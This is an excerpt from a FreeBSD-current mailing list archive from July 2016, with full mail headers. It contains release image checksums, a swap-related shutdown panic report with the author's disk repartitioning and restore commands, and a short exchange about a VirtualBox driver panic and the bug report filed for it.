56d9a5597680ebc7cbc132c53175bead3304572c49a9b46918997a845c0d710c5f7023720d04d02217dbebb11f61f6f06e7ec584e32f34247a3b24e78bc1e12e > SHA512 (FreeBSD-11.0-BETA2-amd64.vhd.xz) = e0e562f99b401021b5433d13119b5f43ca455b6577408bb23dacd4115741be978102a284fde449b5b0eaffc28481a2abff5fac4d778d88f27165122d801887d8 > SHA512 (FreeBSD-11.0-BETA2-amd64.vmdk.xz) = 5d58e5db969238bf071e516da977dce6837e2e4ec463eaed7acb971ca6e1a7db28a515edbdd3865147661d0f3e84e7701f2151a3cff3202b064f8c7e6928d2b6 > > SHA256 (FreeBSD-11.0-BETA2-amd64.qcow2.xz) = 545b72ac98a6a328efd7edb57717391b5fd9168ba755cffa40bb27dde93450f8 > SHA256 (FreeBSD-11.0-BETA2-amd64.raw.xz) = e6ffdc73fae6f61e74bee6f4b297b1c272c1dde1eb49f0ad57017345127babf5 > SHA256 (FreeBSD-11.0-BETA2-amd64.vhd.xz) = 9a33d4269816b35e17d57ed6c2ece7e232d330d2cd0fab709899f6964425a0c1 > SHA256 (FreeBSD-11.0-BETA2-amd64.vmdk.xz) = 7fe0b08faf95614488f37e0821daf331fd4d401880444ac3ce43aa4b47245d41 > > > o 11.0-BETA2 i386: > SHA512 (FreeBSD-11.0-BETA2-i386.qcow2.xz) = a756211e3b5e27c7e824a1670f794d71958e43c180e66b0cea01a7370c8a0f77cbebd31de0c149c78d59cdc09a082ef0d68817fd0a3190401ff36583b0698ed2 > SHA512 (FreeBSD-11.0-BETA2-i386.raw.xz) = fab44b18f4134f3f30a07914ba4ab3f76501029255be07badaedc5a3a8454a7a1730c24fd77e8319ef997b16889546a1a314ecf046b2c365cf2b265044c84629 > SHA512 (FreeBSD-11.0-BETA2-i386.vhd.xz) = 469c99422ab0d5c308a63db9e77a58a1495cd7a5a13b667b116356a4b82d394d704ea98565a4a881cfef8891603a5309462930680fb8bada3d948aa19cc03913 > SHA512 (FreeBSD-11.0-BETA2-i386.vmdk.xz) = 1cb1cd9f5e22c5f72531338303a8d52daa42448dcdd7866e819e8499693514d8a7b7d7f4a9b43587d1d7d30912c4beee63f88549f12d3a1db8fa72b0c4f80e84 > > SHA256 (FreeBSD-11.0-BETA2-i386.qcow2.xz) = 7dae9bdfbe8b7efc35fd4320fe7c6da888b687888392dab3546e05e0ec336978 > SHA256 (FreeBSD-11.0-BETA2-i386.raw.xz) = 50de6c4b9a94973896443f60ee468d48976439af20d981c083455a4fde0c5091 > SHA256 (FreeBSD-11.0-BETA2-i386.vhd.xz) = a0da7491b02fb21185a369551ced20605cdce0e02db80ae1c92b4b4be9207c81 > SHA256 (FreeBSD-11.0-BETA2-i386.vmdk.xz) = 0ea1c3d4bc28153e982c32f38e859f35c0d81d6db01f00cf85705b1f9f3f776e > > > o 11.0-BETA2 aarch64: > SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64.qcow2.xz) = 812b66c9416390d050bb610d785e79a2f50dc5d9bf1560d49f1d3a8b43547600d5da7f205bc977849d5a1671503cffd2932026dddc66603e7307abbf019330e0 > SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64.raw.xz) = f20b9d7fd91d3734e58b76e48aec0a6890d22f8543018410f0ead19c980fa73d3ab92d56c813319f80ce110355715c9c3e7ed04b7ffd9a2a2fbce754b59df791 > SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64.vhd.xz) = 3a444c8fdde10b35bf9f4ac711be6d053af594133e629eee4f357964eba0dc7f84449133edca04a11b045f1c11b20835028331cc115a848a909e9e43e2593e9d > SHA512 (FreeBSD-11.0-BETA2-arm64-aarch64.vmdk.xz) = 4ac6911cc8fe65d3b6a18ac21a8b0cad5eee9a474bec0e0299a455ae64ce138f5ad8ed3b4525a69d2cbedc686d8f8afe853ea37c1d954f06d113728b43bfb349 > > SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64.qcow2.xz) = d0441fe165b655230692949e5257f84676dbae626cbdd194f75ce248091706a4 > SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64.raw.xz) = d41e93301ac87035fe65969b51ca20d74127b2fc72947052710269534355780b > SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64.vhd.xz) = 7017d48f6fdb411dcf4cabc6b059dc0ce5d95dafa4b451816ea950f620ba407f > SHA256 (FreeBSD-11.0-BETA2-arm64-aarch64.vmdk.xz) = 32f1c82aa547b28d8099247f20892fd4c8cf6e11bcadae916fdf9cc57bd31016 > > > Regards, > > Glen > > Love FreeBSD? Support this and future releases with a donation to > the FreeBSD Foundation! https://www.freebsdfoundation.org/donate/ > > _______________________________________________ > freebsd-current@freebsd.org mailing list > https://lists.freebsd.org/mailman/listinfo/freebsd-current > To unsubscribe, send any mail to "freebsd-current-unsubscribe@freebsd.org" > From owner-freebsd-current@freebsd.org Tue Jul 26 08:41:49 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 87C90BA5EF4 for ; Tue, 26 Jul 2016 08:41:49 +0000 (UTC) (envelope-from guru@unixarea.de) Received: from ms-10.1blu.de (ms-10.1blu.de [178.254.4.101]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 4AF181D17 for ; Tue, 26 Jul 2016 08:41:48 +0000 (UTC) (envelope-from guru@unixarea.de) Received: from [89.204.155.146] (helo=localhost.unixarea.de) by ms-10.1blu.de with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:32) (Exim 4.76) (envelope-from ) id 1bRxvp-0006co-Na; Tue, 26 Jul 2016 10:41:43 +0200 Received: from localhost.my.domain (c720-r292778-amd64 [127.0.0.1]) by localhost.unixarea.de (8.15.2/8.14.9) with ESMTPS id u6Q8fbVa004336 (version=TLSv1.2 cipher=DHE-RSA-AES256-GCM-SHA384 bits=256 verify=NO); Tue, 26 Jul 2016 10:41:37 +0200 (CEST) (envelope-from guru@unixarea.de) Received: (from guru@localhost) by localhost.my.domain (8.15.2/8.14.9/Submit) id u6Q8fYqY004335; Tue, 26 Jul 2016 10:41:34 +0200 (CEST) (envelope-from guru@unixarea.de) X-Authentication-Warning: localhost.my.domain: guru set sender to guru@unixarea.de using -f Date: Tue, 26 Jul 2016 10:41:34 +0200 From: Matthias Apitz To: Mark Millard Cc: FreeBSD Current Subject: Re: seldom crashes on Dell E6330 with 12-CURRENT Message-ID: <20160726084134.GA4295@c720-r292778-amd64> Reply-To: Matthias Apitz Mail-Followup-To: Matthias Apitz , Mark Millard , FreeBSD Current References: <20160726055015.GB2981@c720-r292778-amd64> <32C7E9E5-A51C-4836-9939-0D000016808C@dsl-only.net> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: <32C7E9E5-A51C-4836-9939-0D000016808C@dsl-only.net> X-Operating-System: FreeBSD 11.0-CURRENT r292778 (amd64) User-Agent: Mutt/1.5.24 (2015-08-30) X-Con-Id: 51246 X-Con-U: 0-guru X-Originating-IP: 89.204.155.146 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 26 Jul 2016 08:41:49 -0000 I just got a new panic with drop to debugger after shutdown, all disks have synced correctly, only something to page-in from swap was causing the problem; I don't know how to get a screen-shoot from this, so I took a picture, it's here http://www.unixarea.de/panic.jpg Btw: how can the kernel read from a swapfile if the file system is already unmounted? matthias -- Matthias Apitz, ✉ guru@unixarea.de, ⌂ http://www.unixarea.de/ ☎ +49-176-38902045 "Wer übersieht, dass wir uns den anderen weggenommen haben und sie uns wiederhaben wollen, kann von den Kämpfen der letzten Tage keinen verstehen. Und kann natürlich auch keinen dieser Kämpfe bestehen." Hermann Kant in jW 1.10.1989 From owner-freebsd-current@freebsd.org Tue Jul 26 09:02:56 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 78143BA3887 for ; Tue, 26 Jul 2016 09:02:56 +0000 (UTC) (envelope-from markmi@dsl-only.net) Received: from asp.reflexion.net (outbound-mail-211-169.reflexion.net [208.70.211.169]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 2EA151AFE for ; Tue, 26 Jul 2016 09:02:55 +0000 (UTC) (envelope-from markmi@dsl-only.net) Received: (qmail 4850 invoked from network); 26 Jul 2016 09:02:54 -0000 Received: from unknown (HELO mail-cs-01.app.dca.reflexion.local) (10.81.19.1) by 0 (rfx-qmail) with SMTP; 26 Jul 2016 09:02:54 -0000 Received: by mail-cs-01.app.dca.reflexion.local (Reflexion email security v7.90.6) with SMTP; Tue, 26 Jul 2016 05:02:54 -0400 (EDT) Received: (qmail 6546 invoked from network); 26 Jul 2016 09:02:54 -0000 Received: from unknown (HELO iron2.pdx.net) (69.64.224.71) by 0 (rfx-qmail) with (AES256-SHA encrypted) SMTP; 26 Jul 2016 09:02:54 -0000 X-No-Relay: not in my network X-No-Relay: not in my network Received: from [192.168.0.105] (ip70-189-131-151.lv.lv.cox.net [70.189.131.151]) by iron2.pdx.net (Postfix) with ESMTPSA id 7A0A21C4075; Tue, 26 Jul 2016 02:02:52 -0700 (PDT) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Mac OS X Mail 9.3 \(3124\)) Subject: Re: seldom crashes on Dell E6330 with 12-CURRENT From: Mark Millard In-Reply-To: <20160726084134.GA4295@c720-r292778-amd64> Date: Tue, 26 Jul 2016 02:02:52 -0700 Cc: FreeBSD Current Content-Transfer-Encoding: quoted-printable Message-Id: <8951B564-DE07-4D8D-B2D8-E3613EA5D9FE@dsl-only.net> References: <20160726055015.GB2981@c720-r292778-amd64> <32C7E9E5-A51C-4836-9939-0D000016808C@dsl-only.net> <20160726084134.GA4295@c720-r292778-amd64> To: Matthias Apitz X-Mailer: Apple Mail (2.3124) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 26 Jul 2016 09:02:56 -0000 > On 2016-Jul-26, at 1:41 AM, Matthias Apitz wrote: >=20 > I just got a new panic with drop to debugger after shutdown, all disks > have synced correctly, only something to page-in from swap was causing > the problem; I don't know how to get a screen-shoot from this, so I = took > a picture, it's here http://www.unixarea.de/panic.jpg >=20 > Btw: how can the kernel read from a swapfile if the file system is > already unmounted? I've no clue how the kernel is supposed to make sure that it does not = need to use swap content that late. The answers to your question are = well outside my knowledge base. I do not remember getting such a result = myself. Hopefully someone else can help or use your report to analyze the issue. = You may want to submit a problem report in bugzilla for what happened, = describing the context that it happened in. > matthias =3D=3D=3D Mark Millard markmi at dsl-only.net From owner-freebsd-current@freebsd.org Tue Jul 26 14:13:54 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id D073CBA431E for ; Tue, 26 Jul 2016 14:13:54 +0000 (UTC) (envelope-from guru@unixarea.de) Received: from ms-10.1blu.de (ms-10.1blu.de [178.254.4.101]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 93040125A for ; Tue, 26 Jul 2016 14:13:54 +0000 (UTC) (envelope-from guru@unixarea.de) Received: from [89.204.155.146] (helo=localhost.unixarea.de) by ms-10.1blu.de with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:32) (Exim 4.76) (envelope-from ) id 1bS37F-0001fK-PA; Tue, 26 Jul 2016 16:13:50 +0200 Received: from localhost.my.domain (c720-r292778-amd64 [127.0.0.1]) by localhost.unixarea.de (8.15.2/8.14.9) with ESMTPS id u6QEDjtl007897 (version=TLSv1.2 cipher=DHE-RSA-AES256-GCM-SHA384 bits=256 verify=NO); Tue, 26 Jul 2016 16:13:45 +0200 (CEST) (envelope-from guru@unixarea.de) Received: (from guru@localhost) by localhost.my.domain (8.15.2/8.14.9/Submit) id u6QEDh9P007896; Tue, 26 Jul 2016 16:13:43 +0200 (CEST) (envelope-from guru@unixarea.de) X-Authentication-Warning: localhost.my.domain: guru set sender to guru@unixarea.de using -f Date: Tue, 26 Jul 2016 16:13:43 +0200 From: Matthias Apitz To: Mark Millard Cc: FreeBSD Current Subject: Re: seldom crashes on Dell E6330 with 12-CURRENT Message-ID: <20160726141343.GA7857@c720-r292778-amd64> Reply-To: Matthias Apitz Mail-Followup-To: Matthias Apitz , Mark Millard , FreeBSD Current References: <20160726055015.GB2981@c720-r292778-amd64> <32C7E9E5-A51C-4836-9939-0D000016808C@dsl-only.net> <20160726084134.GA4295@c720-r292778-amd64> <8951B564-DE07-4D8D-B2D8-E3613EA5D9FE@dsl-only.net> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: <8951B564-DE07-4D8D-B2D8-E3613EA5D9FE@dsl-only.net> X-Operating-System: FreeBSD 11.0-CURRENT r292778 (amd64) User-Agent: Mutt/1.5.24 (2015-08-30) X-Con-Id: 51246 X-Con-U: 0-guru X-Originating-IP: 89.204.155.146 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 26 Jul 2016 14:13:54 -0000 I have moved swap to its own partition using this commands: ... it turned out, that having swap as a plane file in /usr was not a good decission, we deleted (after making DUMPS) the 'ssdusrfs' again, created swap and re-created 'ssdusrfs'; this must be done while /dev/gpt/ssdusrfs is not mounted! # gpart show -l ada0 => 40 488397088 ada0 GPT (233G) 40 1024 1 ssdboot (512K) 1064 984 - free - (492K) 2048 4194304 2 ssdrootfs (2.0G) 4196352 4194304 3 ssdvarfs (2.0G) 8390656 480006144 4 ssdusrfs (229G) 488396800 328 - free - (164K) be carefully with the correct number of the index, in our case 4; check the output of 'gpart show -l ada0' before doing this: # gpart delete -i 4 ada0 create the swap partition: # gpart add -t freebsd-swap -l ssdswap -a 1m -s 8g ada0 and the rest is our 'ssdusrfs' again: # gpart add -t freebsd-ufs -l ssdusrfs -a 1m ada0 # newfs -U -t /dev/gpt/ssdusrfs the new /etc/fstab should look like this: # Device Mountpoint FStype Options Dump Pass# /dev/gpt/ssdswap none swap sw 0 0 /dev/gpt/ssdrootfs / ufs rw 1 1 /dev/gpt/ssdvarfs /var ufs rw 2 2 tmpfs /tmp tmpfs rw,mode=01777 0 0 /dev/gpt/ssdusrfs /usr ufs rw 2 2 we need gzip and some shared libs (which normaly are in /usr); I copied them on some other system into the externals disk where the DUMP is: # cp -p /usr/bin/gzip /usr/lib/liblzma.so.5 /usr/lib/libbz2.so.4 /mnt now mount and restore the DUMP: # mount tmpfs # mount /usr # cd /usr # mount -o ro /dev/da0s2a /mnt # LD_LIBRARY_PATH=/mnt export LD_LIBRARY_PATH # gzip -dc /mnt/e6330/dumpse6330-20160726/usr.dmp.gz | restore -x -f - # umount /mnt # reboot -- Matthias Apitz, ✉ guru@unixarea.de, ⌂ http://www.unixarea.de/ ☎ +49-176-38902045 "Wer übersieht, dass wir uns den anderen weggenommen haben und sie uns wiederhaben wollen, kann von den Kämpfen der letzten Tage keinen verstehen. Und kann natürlich auch keinen dieser Kämpfe bestehen." Hermann Kant in jW 1.10.1989 From owner-freebsd-current@freebsd.org Tue Jul 26 17:03:59 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 75AC7BA5957 for ; Tue, 26 Jul 2016 17:03:59 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: from bigwig.baldwin.cx (bigwig.baldwin.cx [IPv6:2001:470:1f11:75::1]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 568F71621 for ; Tue, 26 Jul 2016 17:03:59 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: from ralph.baldwin.cx (c-73-231-226-104.hsd1.ca.comcast.net [73.231.226.104]) by bigwig.baldwin.cx (Postfix) with ESMTPSA id 191FCB95D; Tue, 26 Jul 2016 13:03:58 -0400 (EDT) From: John Baldwin To: freebsd-current@freebsd.org Cc: Randy Westlund , Jung-uk Kim Subject: Re: Panic when loading vboxdrv module Date: Tue, 26 Jul 2016 09:22:47 -0700 Message-ID: <2767658.4fcdAjrkcG@ralph.baldwin.cx> User-Agent: KMail/4.14.3 (FreeBSD/10.3-STABLE; KDE/4.14.3; amd64; ; ) In-Reply-To: <20160726030815.GB12568@gmail.com> References: <20160725191314.GA10757@gmail.com> <7875d0e7-6cbd-6184-3f34-a2fbd00788b1@niksun.com> <20160726030815.GB12568@gmail.com> MIME-Version: 1.0 Content-Transfer-Encoding: 7Bit Content-Type: text/plain; charset="us-ascii" X-Greylist: Sender succeeded SMTP AUTH, not delayed by milter-greylist-4.2.7 (bigwig.baldwin.cx); Tue, 26 Jul 2016 13:03:58 -0400 (EDT) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 26 Jul 2016 17:03:59 -0000 On Monday, July 25, 2016 11:08:15 PM Randy Westlund wrote: > On Mon, Jul 25, 2016 at 07:43:32PM -0400, Jung-uk Kim wrote: > > Oops, I meant INVARIANTS. Anyway, it should be fixed in r419083. I > > understand you have a panic with aio(4) but that's a separate issue. > > > > Jung-uk Kim > > Should I create a new PR for virtualbox and aio, or is this already > known? Please. cc me on it since I've hacked on aio in 11/HEAD. -- John Baldwin From owner-freebsd-current@freebsd.org Tue Jul 26 18:17:08 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id D0124BA54FC for ; Tue, 26 Jul 2016 18:17:08 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: from mail-qk0-x22e.google.com (mail-qk0-x22e.google.com [IPv6:2607:f8b0:400d:c09::22e]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 86B9B1A8B; Tue, 26 Jul 2016 18:17:08 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: by mail-qk0-x22e.google.com with SMTP id o67so13649003qke.1; Tue, 26 Jul 2016 11:17:08 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=date:from:to:cc:subject:message-id:references:mime-version :content-disposition:in-reply-to:user-agent; bh=we8n41Brh/R7nF+Y7naYtgNNdFvnz+KSuko4ToepcnY=; b=dZGBi/1HIEiGukaD0wlgJRpY9YfdAyir82S/st17cx+AsyXppkuyj6cP4L5Mj7LP/T iw/oYNFytNMV93abjomjWvtiPYMyJtD0XLoUMnGsb0uPy5jN7eF/s2yUnjKpq/09OscN WjeShN+KVxx7HZmBCyYADSW8aw9mmo0IlBPjiKcDRSwrub1AFmOZSyPd00MQPqfy/7uM KZOmhM+XhA4lsq4eHWVOEiVV2l0up7pT7rGI2xlckVURV2Bz2MUoXjaCnC9aecwrgzN2 OjWZ9GZunRW3tVF4GlC5QfOTRRYMMsfRFYDkb7XjJ1vrtdd53MtBwqTt3PauHkGXu9vG nGqQ== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:cc:subject:message-id:references :mime-version:content-disposition:in-reply-to:user-agent; bh=we8n41Brh/R7nF+Y7naYtgNNdFvnz+KSuko4ToepcnY=; b=UXybkz2D2ETR4VRiVXz6emzSxYyjCoPLZkMXi4HsuAYym6XSYdEZn7qfkODVtSRKxA X4pHvuHM4Y7mp8GJf4x2f9xLZ1EeucaMsjttDGnC/43zpuV17oacimyCoVw3RGA8aOKq WcdoNofXpCkm0iAzvyakcjTnMD1Abp4eZcb544FNGOXQnY/LL60UG+aSCSrm5+vPEj+P GmfmWpiNy/N0JepIkhyio8rIkz8Ho6+dRZYyFeTGYGMigakOPHVpGEAtgKAaBPLttMYj X7xVOuWPQze3zv6S2Q+Dd8Usp9slFs6wgNmra1QAs5rc0oOUA4OvI17saCzoAnGkOTMR BU/g== X-Gm-Message-State: AEkoouvOOEPdotM6rosW9ZTwRuDcUfm7adg6Uy+qHVbEPzwzc5QI9dlKhBJWmHnzlJWtRw== X-Received: by 10.55.150.195 with SMTP id y186mr29414513qkd.7.1469557027553; Tue, 26 Jul 2016 11:17:07 -0700 (PDT) Received: from gmail.com (c-98-216-247-110.hsd1.ma.comcast.net. [98.216.247.110]) by smtp.gmail.com with ESMTPSA id u6sm1265047qtu.43.2016.07.26.11.17.06 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Tue, 26 Jul 2016 11:17:07 -0700 (PDT) Date: Tue, 26 Jul 2016 14:17:05 -0400 From: Randy Westlund To: John Baldwin Cc: freebsd-current@freebsd.org, Jung-uk Kim Subject: Re: Panic when loading vboxdrv module Message-ID: <20160726181705.GC12568@gmail.com> References: <20160725191314.GA10757@gmail.com> <7875d0e7-6cbd-6184-3f34-a2fbd00788b1@niksun.com> <20160726030815.GB12568@gmail.com> <2767658.4fcdAjrkcG@ralph.baldwin.cx> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="S1BNGpv0yoYahz37" Content-Disposition: inline In-Reply-To: <2767658.4fcdAjrkcG@ralph.baldwin.cx> User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 26 Jul 2016 18:17:08 -0000 --S1BNGpv0yoYahz37 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jul 26, 2016 at 09:22:47AM -0700, John Baldwin wrote: > On Monday, July 25, 2016 11:08:15 PM Randy Westlund wrote: > > On Mon, Jul 25, 2016 at 07:43:32PM -0400, Jung-uk Kim wrote: > > > Oops, I meant INVARIANTS. Anyway, it should be fixed in r419083. I > > > understand you have a panic with aio(4) but that's a separate issue. > > >=20 > > > Jung-uk Kim > >=20 > > Should I create a new PR for virtualbox and aio, or is this already > > known? >=20 > Please. cc me on it since I've hacked on aio in 11/HEAD. >=20 > --=20 > John Baldwin Done. https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=3D211390 --S1BNGpv0yoYahz37 Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXl6khAAoJEGaweXjzNsmpAYsH/A3CcEIC5GUwqkHGd0413X/q Sphq8XJ+q/qLs5j+gpbea1XcLiu5B7xNRY4FWKUo8pLQOjmrE+aVk9hRGaZPuaUl NGIInPnJYOULGYT3gWViGdVz1KHkS0uP2vgv2beQ5uI1NmD0fIgQYFW9F6g6RUSP MfWFjh3ODc/DJ8E81467HQKJVJAHbHpvyQOULahW5bGCSRrPc8o6/rnvdtSVvlTz i4tRmcNFvNVDFavaz4Da39D/IbHpTbxUK3A6D2e5Q4U/CAdd+kVmeASPcNXI63Uc KjtmkpjwI6UXnmzTtYROgmNr2CXeHxkrkUfYE26MmbJd9TtlIC/v1SIF+YEswDk= =Ja7C -----END PGP SIGNATURE----- --S1BNGpv0yoYahz37-- From owner-freebsd-current@freebsd.org Tue Jul 26 23:16:07 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 6908EBA6C6A for ; Tue, 26 Jul 2016 23:16:07 +0000 (UTC) (envelope-from kevans91@ksu.edu) Received: from NAM03-CO1-obe.outbound.protection.outlook.com (mail-co1nam03on0060.outbound.protection.outlook.com [104.47.40.60]) (using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (Client CN "mail.protection.outlook.com", Issuer "Microsoft IT SSL SHA2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 1FB131CBD for ; Tue, 26 Jul 2016 23:16:06 +0000 (UTC) (envelope-from kevans91@ksu.edu) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=KSUemailProd.onmicrosoft.com; s=selector1-ksu-edu; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version; bh=fqV/HEKTxcPWrLd6U/4aR123vamHrlh0OpcNs/8pwkQ=; b=k60m+J3rm9YM6walgBVr346SY9MJxgTHKKzg6hbXtpaO34f0qqx/KEhwNUH6DUQWjwAj9P0n4wRsAoz1G2yecgPfN2EUEfSkOqTNKrcOakBqcnKL2u419udlWJW1fS+8OYC41cNmKFjZBT/wVjm3eWd5pvbJjUgYNF3CNooZeNE= Authentication-Results: spf=none (sender IP is ) smtp.mailfrom=kevans91@ksu.edu; Received: from mail-qt0-f181.google.com (209.85.216.181) by CY1PR0501MB1323.namprd05.prod.outlook.com (10.160.226.140) with Microsoft SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id 15.1.557.8; Tue, 26 Jul 2016 23:16:02 +0000 Received: by mail-qt0-f181.google.com with SMTP id x25so20621662qtx.2 for ; Tue, 26 Jul 2016 16:16:03 -0700 (PDT) X-Gm-Message-State: AEkoouu2vbJTjBHmqhCTFP/CwkB9vkbWZd1PwYZV5dt9LK3chzOaEjY5QHhuATj7iHuBDSEAZGiRPl93Y2fvgw== X-Received: by 10.200.57.34 with SMTP id s31mr42722217qtb.49.1469574957957; Tue, 26 Jul 2016 16:15:57 -0700 (PDT) MIME-Version: 1.0 Received: by 10.237.41.4 with HTTP; Tue, 26 Jul 2016 16:15:38 -0700 (PDT) In-Reply-To: References: From: Kyle Evans Date: Tue, 26 Jul 2016 18:15:38 -0500 X-Gmail-Original-Message-ID: Message-ID: Subject: Re: UEFI Booting on a Thinkpad Yoga 11e w/ Security Chip To: Content-Type: text/plain; charset="UTF-8" X-Originating-IP: [209.85.216.181] X-ClientProxiedBy: CY1PR14CA0072.namprd14.prod.outlook.com (10.164.65.168) To CY1PR0501MB1323.namprd05.prod.outlook.com (10.160.226.140) X-MS-Office365-Filtering-Correlation-Id: 245842a1-1d85-4bd4-b6bd-08d3b5aad012 X-Microsoft-Exchange-Diagnostics: 1; CY1PR0501MB1323; 2:av9wEsja1qt8AHveLZ9VcDWurHo+LHptNTYr0MLLXKaZExCMe8GjjjwrstwHs9sshZmFkRKxCLlANzihFL+NINWnsSrFEGr0tBkCxo6/53k03V7z5qK9qfmUtDuFQD1raOZPd7Magd3MChq8YXGwF1lo5XhV8imtWFvUn1lWM3pkgZI9Px2WkzpSe5WbAp0b; 3:uZjeefqL7P7C3x8XGAq4h3Rn96gRiQZifc3Vi2rcAxxoVsgzOjMnmXrkqbENpBwJO0envk+obVwfBxcjcfj/IHMhyqAkEfQPT6Ghe7U0Y3xe4b+wSgDAZMnoRRcEFRFV; 25:wgjvj5KpPBzrAGoC8HVnEGTvCu297Gi7gXyE6dPNXsY4sTIc8sJ8anyX5K6aLaR+TRvjtb8H++01Xpii7Ck2yuvIx/1FXiTRB2QiazNdQNVXjl3QdBAsUsGoJpr0NjWZ9QOaQy/ZrehWWBzCj4GViIKlrxHDPxHMm89UIX1SUAmb22NuaJnnQUeSOw+2XBoIj16rJYa8rM22bxKyW7D+XzLvhVgi8LTc5O5Amj3u8yuDRbl/36dL8KIoeW2up5EYiSemMmmJB2ENIPHX1s5qNaivkARcdPy8+0Paz6WNA3KVrGHCxij4hVYV7vPnTCV0zMc9yiySEqBQEw4yahSJ+XhcQZAj8XAxFhChX6T52715HI8IIHUaFMRT+RJCcXoUFJb5HMAOlyBDBIoSIRLvjnr6r9NfRaBx8m2ktSxk744= X-Microsoft-Antispam: UriScan:;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1323; X-Microsoft-Exchange-Diagnostics: 1; CY1PR0501MB1323; 31:3DCu5mJHJi+jyiHNXJACby2DZyvV03uga7MUz7iXOaUzWdASOJp+9wmRQFq7aCtm0KRumuYIeETPrT3GI6ieaxPqJxu8zqalnRD0pApvaa3PdUBzGShHs/k5SLrxhJRjtn5Px1tqhP13FZcJq7kvol+3jHba08+sN9IOSmx37ZaVd46hhBHQCfutpDD0mSyOYGW7hYS8i8603l6e9FFpng==; 